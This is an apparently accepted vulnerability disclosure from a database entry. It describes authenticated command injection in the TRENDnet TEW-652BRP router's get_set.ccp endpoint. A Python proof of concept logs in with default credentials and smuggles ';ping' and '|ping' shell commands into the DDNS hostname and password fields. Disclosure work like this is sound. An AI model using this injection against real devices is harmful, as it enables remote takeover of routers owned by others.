| Title | Command injection on TRENDnet router TEW-652BRP(2) |
|---|
| Description | # Command injection on TRENDnet router TEW-652BRP(2)
## Overview
* Type: command injection
* Supplier: TRENDNet (https://www.trendnet.com/)
* Product: TRENDNet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP)
* Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip
* Affect version: latest version 3.04B01
* Bug URL: http://192.168.10.1/get_set.ccp
## Description
A CI vulnerability in the router allows a malicious attacker authenticated on the web to execute any command in the device remotely by crafting a request, enabling an attacker to gain the highest privilege of the system and take over the device.
The device uses a plaintext password to log in web, so it's easy to leak passwords from the HTTP flow. This vulnerability can be exploited easily.
## Reproduce and PoC
### Steps to Reproduce
I have put the PoC code in the next section, configured several parameters, and executed it, the router will send a ping echo to the local host. The parameters are as below:
- device_web_ip: web IP address of the target device.
- username, password: used to visit web management interface.
- ping_target_ip: local host to which router sends ping echo.
You can open Wireshark to monitor the ICMP flow. After executing the PoC, you will see a ping echo from the device to the local host.
### Proof of Concept
Below is PoC written with python3, save the code into the script(exp.py) and execute it.
```
import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'
headers = {'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://{}'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip),
'Upgrade-Insecure-Requests': '1'}
login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
print('Login wrong, please retry!')
exit()
params = {
'ccp_act': 'set',
'ccpSubEvent': 'CCP_SUB_DDNS',
'nextPage': 'ddns.htm',
'ddnsCfg_DDNSEnable_1.1.0.0.0': 1,
'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com',
'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip),
'ddnsCfg_Username_1.1.0.0.0': 'admin',
'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip),
'ddnsCfg_Timeout_1.1.0.0.0': ''
}
method = 'POST'
url = 'http://{}/get_set.ccp'.format(device_web_ip)
try:
r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except Exception as e:
pass
```
|
|---|
| User | leetsun (ID 39457) |
|---|
| Submission | 2023年01月26日 12:10 (1 Year ago) |
|---|
| Moderation | 2023年02月01日 14:23 (6 days later) |
|---|
| Status | 承諾済み |
|---|
| VulDB Entry | 219935 |
|---|